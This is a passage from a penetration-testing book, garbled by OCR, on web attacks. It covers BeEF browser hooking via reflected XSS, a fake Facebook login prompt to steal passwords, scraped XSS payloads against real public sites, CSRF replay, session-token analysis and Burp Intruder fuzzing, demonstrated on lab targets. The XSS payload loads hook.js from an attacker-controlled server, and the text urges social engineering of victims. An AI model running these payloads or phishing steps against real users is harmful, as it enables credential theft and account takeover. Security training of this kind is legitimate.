j_ Wiki: https://github.com/beefproject/beef/wiki 

Project Creator: (@WadeAlcom) 

BeEF is loading. Wait a few seconds... 

12 extensions enabled. 

235 modules enabled. 

2 network interfaces were detected, 
running on network interface: 127.0.0.1 
| Hook URL: http://127.0.0.1:3O00/hook.js 
j_ UI URL: http://127.0.0.1:3000/ui/panel 
running on network interface: 192.168.1.123 
| Hook URL: http://192.168.!.123:3000/hook.is 
L UI URL: http://192.168.1.123:3000/ui/panel 


RESTful API key: da7clc6cdcd9a677^i 
DNS Server: 127.0.0.1:5300 (udp) 

| Upstream Server: 8.8.8.8:53 (iJdp) 
Upstream Server: 8.8.8.8:53 (tcp). 
HTTP Proxy: http://127.0.0.1:6789 I h 


BeEF server started (press control+c 



14a4835 


Starting Up BeEF 


Fef s log into the console UI after the BeEF server has started. As we see from the image above, the 
UI URF in this case is located at http://127.0.0.1:3000/ui/authentication. We can open a browser and 
go to that URF. 


I [”] BeEF Authentication 

^ ^ | & 127.0.0.1:3000/ui/authentication 
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BeEF Login Screen 


If everything started up successfully, you will be able to log into the UI using the username “beef’ and 
password “beef’. If we look at the image where we loaded BeEF via the command line, we see a 
URL for both the UI page and the hook page (Hook URL). Let's take a moment to review the hook 
page (hook.js). 


& 127.0.0.1:3000/hook js _ vg|lH v Google 
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/•! jQuery vl.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | )query.org/license 
//@ sourceHappingURL*]query-1.10.2.»in,iiap 
»/ 

(function(e.tKvar n,r,i-typeof t,o-e.location,a-e.document,s-a.docuaentEleaent,l-e.jQuery,u-e.J, 
O.p*!),f“”l.10.2".d-p.concat.h=p.push,g=p.slice. »»p.indexOf,y=c.toString.v-c.has(VnProperty,b=f. 
x.fn.init(e,t,r)},w-/[+-)?(?:\d»\.I)\d+(?:(eE]|+-]?\d+|)/.source,T-/\St/g,C./-I\s\uFEFF\xAO]+|I\s 
(<l\v\W]+>)r>|*|#((\v-] , ))$/,k-/*<(\w+)\S*\/?>(?:<\/\l>|)$/.E-rl\),:0\sl'$/.S-/(?:*|: |,)(?:\S* 
I'WVbfnrt) |u(\da-fA-F]{4))/g, j—/* (“ “W\r\nl * * I true I false | null I - ?(?: \d+\. I )\d+(?: [eE|[+-]?\d+|)/ 
zl )/gi,H-function(e, tHreturn t. toUpperCase()},q-function(e){(a.addEventListener| |"load"—e. type 
(_0, x. ready ())} ,_-function (){a. addEventListener? 

(a. removeEventListenerCDOHContentLoaded", q,! 1). e. reaoveEventListener("load",q.! 1)): 

(a.detachEvent("onreadystatechange",q),e.detachEvent("onload",q))};x.fn-x.prototype- 
<)query:f,constructor:x,mit:function(e,n.r){var i,o;if (!e)return this,-ifCstring"-=typeof e){if( 
<-===«. charAt(Q)S£'>"—=e.charAt(e.length-l)&&e.length>»3?[mill.e, null] :N.exec(e). !i| I !ill)SSn)re 
(n| | r) .find (e): this, constructor (n) .find (e); if (ill) )uf (n-n instanceof 

x?n|01 :n,x.«erge(this.x parseHTMUi111 .n&Sn.nodeType?n.ovnerOocu»ent| | n: a. !0)).k. test (ill) )Mx .is 
n)x.isFunction(this|i])?this(i|(nli)):this.attr(i,nil]);return thislif(o-a.getEle«entBvId(il21).o 
{if(o.id!~i121)return r.find(e);this.length-1.thisi01 -o}return this.context-a,this.selector*e,th 

/fhic rnntavi— thi c Ihl — a thi« lonnth-1 thieUv t cPi inr 1 1 «r» / a \ ?r roaHu \ ' /a colortnrl—t£X 

BeEF Client Side JavaScript 


Although this JavaScript has been well obfuscated, this is the payload that will control the victim user 
and will be injected into the victim browser's page. Once injected, their browser will connect back 
into your central server with the victim unaware. 

LAB - XSS on OWASPBWA 

We were able to identity an XSS via Burp or ZAP on our vulnerable Web Application VM 
(OWASPBWA). So, we can directly access the vulnerable XSS by connecting to our web service: 


• [IP_of_OWASPBWA]/owaspbricks/content-2/index.php? 

user=harry3a20 l<script>alert( 1 )<%2fscript>6f350 


Since we have located an XSS vulnerability on a page, we can now use BeEF to help with the 









exploitation of the end user. In our initial example, 
http://[IP_of_OWASPBWA]/owaspbricks/content-2/index.php?user=, the user variable takes any 
input and presents it to the end user. This proves that the end user does process the JavaScript code 
embedded from our query. 
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Bricks - XSS 


To create a successful exploit, instead of printing an alert, we are going to craft a URL that uses 
JavaScript to include the hookjs file. It will look something like: 

• http://192.168.1.124/owaspbricks/content-2/index.php?user=harry3a201<script 
src=http://l 92.168.1.123:3000/hook.j s></script> 

I was able to append the hookjs script by using the JavaScript code: 

• <script src=[URL with hookjs]></script> 


Remember that if this is done on a public site, then the URL will need to point to a public address that 
hosts the hookjs page and listening service. 


Once you trick a victim into going to that URL using Social Engineering Tactics, they will become a 
part of your XSS zombie network. Going back to our UI panel, we should now see that a victim has 
joined our server. 




& 127.0.0.1: 3000/ui/panel _ 
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Hooked Browsers 
* <-S Online Browsers 
192.168.1 .1 24 
• A Si92.168.1.123 
ILU Offline Browsers 


Getting Started 

>X! I 

Logs 

Details Logs 

Commands 

Ric 


Module Tree 

Search 

^ t-Al Browser (52) 

* Hooked Domain (24) 

4 Fingerprint Ajax 
Get Cookie 
4. Get Form Values 
4. Get Local Storage 
4. Get Page HREFs 
4 Get Page HTML 


Get Page and iframe F 
Get Session Storage 
Get Stored Credential; 
4* Overflow Cookie Jar 
Remove stuck iframe 
4 Replace HREFs 


M 

id 

T 

v 


BeEF Client Attacks 


With an account hooked, there are many different modules within BeEF to exploit the end user. As 
seen in the image above, you can try to steal stored credentials, get host IP information, scan hosts 
within their network, and much more. 


One of my favorite attacks is called "pretty theft" because of its simplicity. Drop down to the Social 
Engineering folder, select Pretty Theft, then configure it how you want in this case, we will use the 
Facebook example, and hit execute. Remember that the IP for the custom logo field has to be your 
BeEF IP. This will allow the victim to grab the image from your server. 


£J1W1681 124 

• A Sl921681 

OfIV* BfOWMrt 


Module free 

Module Results History 

Pretty Theft 


| Search | 

1.. dale 

label 

Description 

Asl t the user for thee username i 

I :■ QPurHUnce (4) 

Cl Phonegsp (1 6) 
e Social Engneei ng (21) 

3 

0 201S-0 

16 31 

command 


uang a floating dv 



Didog Type 

Facebook y*\ 

• Steal Autoccmptate 




Bacfcng 

Oret v 

m Fake LastPass 
• Ctct lack ng 




Custom Logo 
(Generic only); 

http HO 0 0 0 3000Ajfc*medi 


• C*wr 

• F*e FWi Update 

• F#e M*f<awn Bar <Chr 

• Fake Notrfeabon Bar (Fee 

• f». r*»» mm 8» to 

• Feefox Extension (Bndst 

• Feefox Extension (Dropp* 

• Feefox Extension (Rever- 

• Goo^e Ptosfrng 

• Lcenrtuf Oownfcxad 


) Pretty Then 

Pretty Theft Facebook Attack 


After the attack is submitted, a Facebook password prompt will pop up onto the victim's system. This 
is where you can get creative by using a popup in which your target users would most likely enter 
their information. If you are looking to gain Google accounts, there is also a Google Phishing module. 











The benefit of this client-side attack is that the ordinary-looking password prompt popup keeps the 
user unaware that they are part of this zombie network. 


$1 92.168 1.1 24/owaspbricks/content-2/index. php?user=harry3a201<sc ^ C B v Google 
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Pretty Theft Attack 


Log in 


After the unsuspecting victim types in their password, go back to the UI to find your loot. Clicking on 
the ID “0” will show the attacker what the victim typed into that box. This should be enough to start 
gaining some access as the user, allowing you to move laterally through the environment. 


Details Logs Commands 

Rider XssRays Ipec j N 


Module Tree 

Module Results History 

Command results 


i... dale label 

1 Fri Mar 13 201516:3247 GMT-C 

data answer=pwned pwned 

• Google Hfnshng 

• Lcamtuf Download 

* 

0 2015-0... command 

1831 1 

0 Pretty Theft 
• Replace Videos (Fake PL 





Pretty Theft Results 


I hope I was able to demonstrate how powerful an XSS vulnerability can be. It is exponentially worse 
if the XSS finding was a stored XSS versus the reflective XSS example we just saw. If it had been a 
stored XSS, we most likely wouldn't even need to use social engineering tactics on the victim to go to 
the link; we would just need to wait until our code was executed by the victim’s system. 


Cross-Site Scripting Obfuscation : 

A common problem for an attacker injection code is that the application implements some sort of 
input validation for vulnerable XSS fields. This means the XSS is still valid, but you don't have all 
the normal characters you need to successfully take advantage of this vulnerability. However, the 
great thing for a pentester is that these filters are usually improperly configured. 


Fortunately, since there are so many different types of ways to encode your XSS attacks, the filters 
from the input validation scripts usually fail. You really could write an entire book about how to craft 
different XSS attacks, but here are my quick and dirty tricks to get a working list of encoders. 















Crowd Sourcing 

One of my favorite methods to find a huge number of valid XSS vulnerabilities is to visit 
http://www.reddit.eom/r/xss. People will post the different XSS findings they have come across on 
that sub-reddit. This is a great way to see what other types of XSS vulnerabilities people are finding. 
Scanners are good, however, they can never replace a human eye. A lot of the findings on this sub- 
reddit were not found by an automated process, but found manually. 


I created a quick script to grab and parse all the results from the crowd-sourced sub-reddit. To kick 
off your own scan: 

• cd /opt/reddit_xss/ 

• python redditxss.py 


:/opt/midit xss* pytneo roddn_xss.py 
[•] Reddlt XSS scrap* in progress 

(*) Pres* CTRL-C to Stop. Output will bo saved to output xss.txt 
it i :/opt/reddit iss# nore output_xss.txt 

ittp://www.thlngiv8rse.com/search/relevant/Things’q^OuadrocopterSlt;/span Sgt;S\t;scriptSgt;alert(/XSS 
OSED/);Slt;/script&gt; 

'ittp://WM».cn8t f rance.fr/produits/asslstances-malntfinafices-loglcloUe/carepaq-support -d-information-pr 
dult -60006246p .htiA27%22%3EV3C/tiU*«e%3Csc rlpt%3Ealert%28%22XSSPOSE>k22\29\3C/sc rlptV3E«E/ 
ittp://wxnx.bbc .co.uk/lndonesia/search/?q=*22\20style=background:red;loft :6;top:0;helght :506px;wldth:M 
px;poslUonft20:absolut*;z-Index :lO00H20onmouseover»al*rt(/XSSPO$EO/)%20\22 

ittp://WM«.eapqu*st ,cos/Mps?la=«7V2«EWC/tlUe%3£\3Csc rlpt\3EaUrt%28/XSSP0SE0/V9WC/sc rlpi\3EW6 

amp;lc^27%22V.iE%3C/UtleV3E%3Csc rlpt%3Ealert%28/XSSPOSEO/\29VK/sc ript\3EV3ESamp;ls=%27%22\3E\27%22V3 
i3C/tlt\o\3E%3Cscrlpt%3E%20alert%28\22XSSP0SE0%22S29%3C/scrlpt\3E\3E/Saop;lz=%27V2\3E%3C/title%3E%3Cs 
ript'k3E%20alertV8%22XSSPOSECft22S29\3C/scrlpt%3E < k3E/6amp;2e=100»lNTERNATIONAUDRlVE6anp;2c=JACKSON&arr,D 
2s=HSSamp;2z=39208 

self.regox(rosolvo_ response)_ 


Reddit XSS Scrape 


Once competed, a file named output_xss.txt will be generated. As you will see in your output, people 
will obfuscate XSS attacks with “from CharCode”, percent encoding, htmlentities, and other 
JavaScript commands. Now, you are armed with a good list of XSS examples (many of them still 
active) and encodings. One quick additional note is that I do not recommend you visit the vulnerable 
site with the XSS payloads, as you could be seen as attacking their website. What I wanted to do was 
show you how to generate a good list of encoding examples that might help you in your attacks. 


OWASP Cheat Sheet 

Another resource I often use is the OWASP Evasion Cheat Sheet. This is usually the first place I look 
whenever I run into an encoding problem on any of my engagements. 

The cheat sheet can be found here: 

https: / / w w w ,o wasp .org/index.php/XS S_F ilter_Evasion_Cheat_Sheet . 


The most common XSS problems I find usually arise from length issues or the fact that the 
greater/less than symbols are not allowed. Luckily, the OWASP has many different examples to get 
around these issues. 






Cross-Site Request Forgery (CSRF) 


Cross-Site Request Forgery basically allows you to force an unwanted action onto the victim. For 
example, you send a link to someone who is currently logged into their bank account. When that 
person accesses your link, it automatically transfers money out of their account into your account. 
This happens when there is no verification process to check that the user went through the appropriate 
steps to transfer money. 


What I mean is that in order to transfer money, a user needs to login, go to their transfer payment page, 
select the recipient and then transfer the money. When these appropriate steps are taken, a CSRF 
token is generated on each and every page as you progress through the application. Additionally the 
previous token is verified before the next step can process. You can think of this as a tracking system- 
if any of those tokens are empty or wrong, the transaction does not process. 

There are many complex ways to test this, but the easiest way to manually run these tests is through 
proxying traffic. I will go through the process of making a transaction as described above and see if I 
can replay it. However, in the replay, my goal is to get the same end result without having to go 
through all of the steps, which proves that there is a CSRF vulnerability. 


Using Burp for CSRF Replay Attacks 

Let's take an example where a bank application allows transfers from one user to another. In the URL 
below, there are two parameters that are used. The first parameter is User (to whom the money will 
go). The second parameter is the dollar amount. In the case below, we successfully transferred money 
to Frank. 


What would happen if I sent this same URL to another person who was already logged into the same 
bank application? Well, if a CSRF protection were not in place, it would transfer $123.44 from the 
victim host to Frank, instantly. 


ht£ securepla.net/xss_example/bank.php?llser=Frank&Dollar=123.44 

<s> Disable » ^ Cookies * /■ CSS » gg Forms ’ H Images * / Information • £«i Mlscellane 

Bank Transfer Accepted For Users Frank For the Amount: SI23.44 

CSRF Example 


To test if this is possible, we first capture the request via Burp. Make sure that your browser is still 
proxying to Burp and make the request with user 1. This should work just fine as you went through the 
proper channels to make the transfer. You should be able to log in, go to the transfer page, fill in the 
information, and submit. 


In the example below, we can go to Burp's Proxy Tab and the History to see our last requests. At the 






very bottom, we see the request for the bank transfer. We also see that there is a hook cookie, but 
nothing that looks like a CSRF token. 


Burp intruder Repeater Window Help 

r - \ ■-»i 

Target Proxy Spider 

f - 

Scanner 

" i "— —— "i — ■■■ k 

intruder Repeater 

f-1 

Sequencer 

r —n 

Decoder 

r -i -- 

Comparer Extender 

r 1 r 1 

Intercept History 

r 1 

Options 


filter: Hiding CSS. image and general binary content 

A 

Host 

Method URL 


hnp://www. seen repla.net 
http S /gwyle a d j . y, doub l etl n k,,. 
http //clwntsl.google .com 
http' y/gtglobal-ocs p. geot r ust.... 
http://securepla.net 
http: f }vnm. s c cu re pla mt 
FmpT7/secure pla.net 


GET 

GET 

POST 

POST 

GET 

GET 

TFT 


/ 

/pag^ad/ad m=ca - p ub-9o 8 5 1 7 3 s ? s g 7 1 809SoLrtput 

/oc sp 

/ 

/xs s_exa mple /exam p le. p hp?ale rt=a s d Cscrip 3 Eale rt(? 
/xs s s xa mple /exa mple.p hp?a len-asd a>;3 C scr ip t$£3 E ale rt(5 


/xss exa mplt/ba nkTp'hp?(Jser= Fra nkfibolfa r= mm 




V 


Request Response 


J 


■-ir- v - - — 

Raw Pa rams , Headers 


Hex 


GET /xss_example/baokVphp?User=F]:arjk^DolIai'= 12 ! 5.14 HTTP/LI 

Host: securepla.net 

User-Agent: Hazilla/S.O (Macintosh; Intel Map 09 X 10.8; xv:24 + 0) Oecko/201QQ1Q l 
Accept: text/html,application/xhtml+xml x application/xml;q=0,9, 1 /*; q =0.3 
Acce pt -L a ngua ge: Bft-US , e n; q“0 . S 
Accept“Encodi.nq:_ qzip, deflate 
Cookie; HOOK=bF 0 tH P Pa h J HlOE 6 r 2oSOe 13 SKSqavUBDwOuekw3&1 ft h6vqWT^wXLimhCbBUlLpfl vMG v£ 
Connection: xeeu-aiive 


Burp CSRF Example 


To validate this, we can actually try to repeat the request. I usually try this method because it tells me 
instantly if I can repeat requests without having to perform any additional actions. 


If you right-click anywhere in the Raw Request area, the option to "Send to Repeater" appears. 







































































Intercept History 

Options 


Filter: Hiding CSS, Image and general binary concern 

±1 H«t 
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fauna 

Edlwt 


hnp ;/www.secur epla.net GET 
toJ/floogkid^doobltcteL. get 
hnp ://£tantsL.google.cQiii KM 
hup ‘//gG^kap.flHniL... POST 
hnp://securepta.net GET 

tfflpij 1 /www.h cure pla. ne [ GET 


I hup jmuitpb-m 


t 

tmiii JdlMH W- a-ptf-908 51 73 5 ?S971 S09*Otf p «■ h,.. 

/Kip v 

/ 

/« i_ph nple / e Kan *p le. p hpfalen* aidiK3 esc n pffi J Ea lenptz.... 

Ix\i ix3 mple /txamp k. p hp?atert- asdaW Csc ripftJ Ealert$2.,. 
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Host: eiEurepla.net 

Use*-Agent: Manilla/ 5,0 (Macintosh; Intel Mac OS K LQ.Sj r 
Accepti t e set / html, a pplie at Ion/ jchtnl+ml j -ippl icat ion/ kbiI ; g*l 
AcCrpt-Languaijc; cn-CJS,, e 
kcceut-Encoding: cp£ if>„ deflate 
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Send to Spider 

Do an active xan 

Do i pa Ufa sea a 

Send to intruder 

Meu+I 

if.] 

iend to Repeater 

Metn-ft 

«jWA? 

Send la Sequencer 

Send to empirer 

Send iQ Decoder 




Sending to Burp's Repeater 


Inside the Repeater Tab, pressing the Go button will repeat the request and the following response 
will be populated. The result in our example was that the amount was transferred again without any 
verification from the user that this request was actually intended. This is great because you could send 
that same link to every user of this bank and Frank would become an instant millionaire. 
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Executing Burp Repeater 


The application shouldn't have allowed the user to transfer money again without going through all the 
steps required to create a transfer request. Without a CSRF token, you could have an unsuspecting 
victim click on a link and have unauthorized transfers occur. If you are looking for more information 
on CSRF attacks, go to OWASPs page: 

https: //www .owasp.org/index.php/Cross- SiteRequestF orgervt CSRF1 . 


Session Tokens 


Session tokens are generally used for tracking sessions, as HTTP is a stateless protocol by default. 
What you want to look for in a session token are: (1) the fact that they cannot be guessed and, (2) that 
they properly track a user. Other things you should look for are when session tokens expire, if they are 
secure, that they validate input, and that they are properly utilized. 


In this section, we are going to specifically look at making sure session tokens are properly 
randomized and that they can't be guessed. Using Burp Suite to capture an authentication process, we 
can see in the response that there is a set-cookie value for the session tokens. This is located under 
the main Proxy tab and sub-tab History. 




















































Burp's Raw Response 


We can right-click within the raw response section and send this request to the Sequencer feature. 


Send to Spider 
Do an active scan 
Do a passive scan 

Send to Intruder Meta+I 

Send to Repeater Meta+R 


Send to Sequencer 


Send to Comparer 

Send to Decoder 

Show response in browser 

Request in browser ► 

r- ----l - **- 

Sending the Raw Request to Sequencer 


Once you click Send to Sequencer, jump over to the Sequencer tab and identify which session tokens 
are important to you. Once you pick your token, you can click the Start Live Capture to start 
generating session tokens. 
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j Target J Proxy Spider ) Scanner ) Intruder Repeat 

ir I Sequencer J 

Jecoder ] Comparer | Exteni 

[ Live capture | Manual load | Analysis options | 





[ 7 j Select Live Capture Request 

Send requests here from other tools to configure a live capture. Select the request to use. configure 


Remove 


Clear , 


Host 


https:// 


Request 

POST /apl/k>gln/deletethisaccountl9 


[ Start live capture 


Token Location Within Response 

Select the location In the response where the token appears. 


® Cookie: 


session-23 748326.2013-11-30T . 


session-23748326.2013-11-30T ... 


O Custom location: 


3 


Configure 


>1 Live Capture Options _ 

Selecting the Session Token 


Once you start the capture, a new window will pop up and it will start processinggenerating tokens. 
After so many tokens, it will give you summaries of entropy (randomness), character-level analysis 
(see image below), and bit-level analysis. In the image below, Burp Suite is analyzing the placement 
of each character. There are many other features within Burp's sequencer tool, so I recommend 
spending some time trying to understand how session tokens are generated. 





































Live capture (8693 tokens) 


Pause 

Copy tokens 

HI Auto analyze (next: 9000) 

Requests: 8693 

Stop 

Save tokens 

Analyze now 

Errors: 0 


| Summary | Character-level analysis | 8it-level analysis ] Analysis Options ] 

[ Summary [ Count j Transitions } Character set ] 


Character Count Analysis - Significance Levels 



Character position 


Anomalies 

278 anomalies were identified In this test: 

character 9 is too rare at position 24 (count: 123S. probability in a random sample: 0.0029%) 
character 0 is too common at position 29 (count: 624, probability in a random sample: 0.00010%) 
character 2 is too rare at position 29 (count 276. probability in a random sample: less than 0.0001%) 
character 3 is too common at position 29 (count 683, probability in a random sample less than 0.0001%) 
character 5 is too rare at position 29 (count 398. probability in a random sample: less than 0.0001%) 
character 7 Is too common at position 29 (count 730. probability in a random sample less than 0.0001%) 
character 8 is too common at position 29 (count: 640. probability in a random sample: less than 0.0001%) 
character 9 is too common at position 29 (count 643. probability in a random sample less than 0.0001%) 

Character Position for Cookies 


I leave a lot here to your own judgment because it takes experience to understand when session 
cookies are or aren't secure. Every major web application I have seen uses different types of 
implementations and algorithms to generate session tokens, so running something like the examples 
above or reviewing source code may be required. 


Additional Fuzzing/Input Validation 


Burp Suite is extremely extensible and has a lot of other features. One quick feature that I find 
extremely helpful during manual testing is the Intruder function. In the Intruder function, you have the 
ability to tamper with any part of the request and provide your own data. This would be very useful if 
you want to supply your own fuzzer input to test a variable. 


We are going to walk through a very high-level overview of how you could use the fuzzing feature. 
The basic idea of the following example is to access an online store and see why parameter fuzzing 
can be highly beneficial. The online store might only link to certain items from their website, but the 
content managers could have put up all of next week's sale items. They just wait for the next week and 




































































link the content from their main website homepage. 


I used to see a lot of these types of issues for sites that do Black Friday sales. They will have all of 
their content and prices hosted, but not linked anywhere on their page or made available to the public. 
Brute-forcing through all of the parameters will allow an attacker to know which items will go on 
sale that following week, before the public is notified. 


I created a dummy website to demonstrate this exact issue. The website: 
www.securepla.net/tehc/hack.php?id=2 . 

has a GET parameter called ID. You can modify this ID field from 1 to 2 to 3 and get different results. 


j h If p : /( wwtt.ifc. ./ hack. php?id■ 2 

( V) ► | [Q [ [\ j 14 www.seturepla l net/tehc/hack,php?id=2 " ■ c | jffij 0 T G- 

Q Disable T ^ Cookies 1 /'■ CSS T |j| Forms 1 0 Images r / Information T $ ^scellaoeo 

Document 1 Document 2 
Document 2; 

Urban Dictionary Describes a Hacker as: A person (usually possessing thorough knowlcdj 
Vfixes t \" which ait nothing moit than auxiliary work-arounds for problems which events 
professional V 

Your IP was logged: 

Brute Forcing Parameters 



We want to brute-force through all the different parameter values to see which pages exist and which 
pages do not. Since we already have our traffic flowing through Burp, we can go to the Proxy tab and 
then to your History tab. You will see all your past requests there. Right-click on that last request and 
click “Send to Intruder”. 



















"nr- 

—iiLip.//y^jyindU! 1 .y.uuyuiaiH.L. 

rr— 

- f Xuucf p 1 At! I. 1 U s LMVIUC15 3 U " 1 d -iyErU... 

71 

http://view.atdmi.com 

GET 
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72 

http://bid.9-doui3teciick.net 

GET 

Mbe/vtew?d-APEucMU24jjS8bFt)C|... 

75 

http://ad.douhledick.net 

GET 

/ad/N8166.279!82,6lDMANAGER.D... 

76 

http://www.securepla.nel 

GET 

/letic/hack.php 

7a 

http ://www. secure pla.net 

GET 

/iehc/hatk.php?id=2 




Request Response 


f —) 



r a 

Raw 

Pa rams 

Headers 

Hex | 


■if 


Host: www.sedurepla.net 
User-Agent: Mozilla/5,0 (Macintosh 
Accept: text/html f appl icat ion/xhtni 
Accept-Language: en-US # en;g=0.5 
Accept-Encoding; giip # deflate 
Refere jc; http;//ww.securepla,net/' 

Cookie: _ utma-130466157,74136705- 

sec 113 580 6 3 50 17 9 jnwJJser Nam* -Tweak 
Connections keep-alive 


http.://www. se cure pla.net/te hc/hatk.php?id=2 
Remove from scope 
Spider from here 
Do an aarve scan 
Do a passive scan 


Send to intruder 


Send to Repeater 
Send to Sequencer 
Send to Comparer (request) 
Send to Comparer (response) 
Show response in browser 
Request in browser 


Sending Request to Intruder 


Your Intruder tab at the top menu bar will light up. When you click that Intruder tab and move to the 
Positions tab, you will see a bunch of highlighted text. Since I am only testing one parameter at this 
time, I will click the "clear" button first, highlight just the "2" value (as it is the only one I want to 
fuzz), and click the "Add" button on the right side. This tells Burp to only fuzz whatever value is fed 
into the ID GET parameter and that parameter will now be yellow. 


There is another configuration selection called the Attack type. For this setting, I left it at the default 
type of Sniper. You should spend a quick second and review each of the different types of attacks on 
Burp Suite's site: 

http://portswigger.net/burp/help/intmder_positioas.html . 
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Targe 

t Positions 

" y .i 

Payloads Options 

i?i Payload Positions 

L*J r 

Configure the positions where payloads will be inserted into the base request. The 

Attack type: 

Sniper 


i 

CET /tehc/hack.php?id S2S HTTP/1.1 

Host: wmrpSecuropla.net 

User-Agent; Mozill a/5,0 (Macintosh; Intel Mac OS X 10,6; rv 
Accept: text/html,appl ication/xhtml+Kml,appl ication/xml;q=0 
Accept-language: en-US,en;q=0.5 

Accept-Encoding: g® ip, deflate 

Referer; http://ww,securepla*net/tehc/hack, php 

Cookie: utiM-130486157 *74136705,1385846217* 1385346217 * 138 

sacU35808350179jrarJJsftrID-l; seel 135803350179jwJJS0rNai»- 
Connection; keep-alive 


Burp Payload Positions 


Go to the Payloads tab (still within the Intruder tab) and click the "Load" button. In this example, I am 
only loading a list of numbers from 1-100. However, you can add almost any type of list, depending 
on what you are working with. For example, if I am working with a database or LDAP queries, I will 
know the parameter that needs to be manipulated and will import a list of those frizzed parameters. It 
is really up to you to figure out which types of tests you should fuzz. From our set-up phase, you 
should have a great fuzzing list located under /opt/SecLists/ on your Kali machine. 































































[ Target | Positions | Payloads | Options | 


[ ■? j Payload Sets 

You can define one or more payload sets. The number of payload sets depe 
ways. 


Payload set: 1_▼ Payload count: 150 

Payload type: | Simple list ▼ Request count: 150 

[ ? j Payload Options [Simple list] 

This payload type lets you configure a simple list of strings that are used as 


Paste 

1 

A 

V - * 

2 


Load ... 

3 

J 


4 


1 Remove Load items from file 


j Clear 

7 



8 



9 

▼ 


Add j | Enter a new item 




Add from list ... 



Burp List 


Once you have your list imported, you will need to kick off the Intruder attack. At the top menu bar, 
go to Intruder and Start attack. After you start the attack, a new Intruder Attack window will pop up 
and Burp will start trying all of the parameter requests. 


Burp 

3 Repeater Window Help 


Tan 

Start attack 

peater ) Sequencer Dec 


Open saved attack 


1 

Actively scan defined insertion points 


[ Tar 

Send to Repeater 



Save attack config ► 


2 ) 

Load attack config ► 



Copy attack config ► 

number of payload sets d 


New tab behavior ► 



Automatic payload positions ► 



Configure predefined payload lists 

Payload count: 150 


Payload type: [ Simple list ▼] 

Request count: 150 

3 

Payload Options [Simple list] 



This payload type lets you configure a simple list of strings that are used 
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Paste 
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Starting Brute Forcing in Burp Suite 

































































Filter: Showing all items 


Request ▲ Payload 

Status 

Error 

Timeout 

Length 

Comrr 

|b 
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baselii 
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200 
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200 
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200 
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200 
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25 

200 
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12 

26 

200 
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299 


13 

1 27 

200 
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315 | 


|14 

28 

200 



299 


| 15_ 

29 

200 
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299 


[ Request 

Response 







[ Raw | Headers ]^Hex | HTML | Render | 

HTTP/1.1 200 OK 

Date: Wed, 15 Apr 2015 03:12:29 GMT 

Server: Apache 

Vary: Accept-Encoding 

Content-Length: 155 

Connection: close 

Content-Type: text/html 


<a href=. /hack. php?id=l >Docuientl</a>Snbsp<a href= ./hack.ph p ?id=2 >Docu«en12 </ 
Systt-n Password — dont hack «e<p><p>Your IP was logged: 


Burp Suite Results 


As the requests start populating, how can you tell if a site has been changed based on parameter 
injection? Well, the easiest way to tell is by the length of the source code on that page, when that 
string is injected. If the source code length is different from a standard baseline, this informs us that 
there have been changes to the page. 

If we look at the sample test above, the parameter values we injected from 5 to 26, resulted in a page 
content length of 299. This source length of 299 is now our baseline for testing. When we go through 
all of the responses of all pages that are not 299 in length, we see that request 27 has a page length of 
315, which gives us the password: “dont hack me” (image above). 


You can also try manipulating other things in the original request. Try testing cookie values, 
GET/POST/HEAD parameters, user-agent strings, and other possible vulnerable fields. 


Other OWASP Top Ten Vulnerabilities 


Since OWASP is the standard in vulnerability categories, I strongly recommend that you familiarize 
yourself with the OWASP Top Ten Vulnerabilities by taking a moment to read through the Top Ten 
Cheat Sheet: 


• https: / / w w w ,o wasp .org/ index.php/OWASP T op_T enCheatSheet 


OpenDNS’ little training program provides a good training environment to test and help you 
understand these vulnerabilities. You can read more about it here: 

• https://engineering.opendns.com/2015/03/16/security-ninjas-an-open-source- 

application-security-training-program/ 























To set up their lab, create a Kali Linux image configured on host-only mode, as it will contain web 
vulnerabilities. 


Setting Up : 

• service apache2 start 

• git clone https://github.com/opendns/Security_Ninjas_AppSec_Training.git 
/opt/SNAT 

• cd /opt/SNAT/ 

• cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini.orig 

• cp php.ini /etc/php5/apache2/ 

• mkdir /var/www/test/ 

• cp -R src/Final/* /var/www/test/ 

• chmod 777 /var/www/test/*.txt 

Now, on your browser within your VM, open a browser to 127.0.0.1/test. This will walk you through 
the top ten issues, supply hints, and teach you how to exploit each of them. 

A1 : Injection * 

■ » 1S 127.0.0.1/test/al.html ^ g | [H v Google Gj\ » s 

Most Visited'-' Inoffensive Security Kali Linux 'V Kali Docs OExploit-DB ^Aircrack-ng 


A1 A2 A3 A4 A5 A6 A7 AS A9 A10 


A1 : Injection 

Whois Lookup Service 


Go 


Hint 1 
Hint 2 
Solution 


OWASP Top 10 

Since this is just a testing site and is vulnerable to attacks, you might want to remove it once you are 
done testing. 

When you are done: 

• rm -rf /var/www/test 

• cp /etc/php5/apache2/php.ini.orig/etc/php5/apache2/php.ini 

• service apache2 stop 







Functional/Business Logic Testing 


I want to stress one additional aspect when testing an application: This book gives a high-level 
overview into web application testing; however, functional testing is really where you make your 
money Functional testing includes horizontal/vertical user rights testing, application flow testing, and 
ensuring things work as they should. For example, ensuring that: 

• Users aren't able to see other user's sensitive data 

• Regular users can't access administrative pages 

• Users can't change data values of other users 

• Workflows cannot be modified outside their intended flow 


One tool too to help with basic functional testing is to use Burp Proxy Pro’s Site Compare Feature. 
After spidering and brute-forcing pages with a regular user and a privileged user, we can go to 
Compare site maps. 


Burp Intruder Repeater Window Help 

Target 
■- 

Site map 


Filter: Hiding not found items; hiding CSS, image and general binary content; hiding 4xx 

/ / i cau.aiiia£v/M.vimi- 

► http://s.amazon-adsystem.com 

► http://sam.zoy.org 

► 0 https://sellercentral.amazon.com 

► http://services.amazon.com 

► http://stackoverflow.com 

► http://static.amazon.com _ 


http://thehacl 

► http://themes 


http://thehackerplayb... GET 
http://thehackerplayb... GET 

http://thehackerplaybook.com/ 

► https://tt.ai 

► http://twitpicJ 

► http://twitvid. 

► http://vimeo.< 

► http://www.6c 

Remove from scope 

http://thehackerplayb... GET 

Spider this host 

Actively scan this host 

Passively scan this host 

http://thehackerplayb... GET 
http://thehackerplayb... GET 
http://thehackerplayb... GET 

► http://www.afc 

► http://www.ac 

Send to SQLMapper 

Send to Laudanum 

- ' 

Request Response 

► http://www.af 

► http://www.al 

k f »ftrv / / IAAAAA/ all 

Engagement tools ► 

Raw Headers Hex 

~ iiu|j./ / www.ciii 

► http://www.all 

Expand branch 

ET / HTTP/1.1 

Aef • f haharVornl auKrwiV 


Burp - Site Comparison 


A Host Met 

► - 

http://thehackerplayb... GET 

http://thehackerplayb... GET 
http://thehackerplayb... GET 
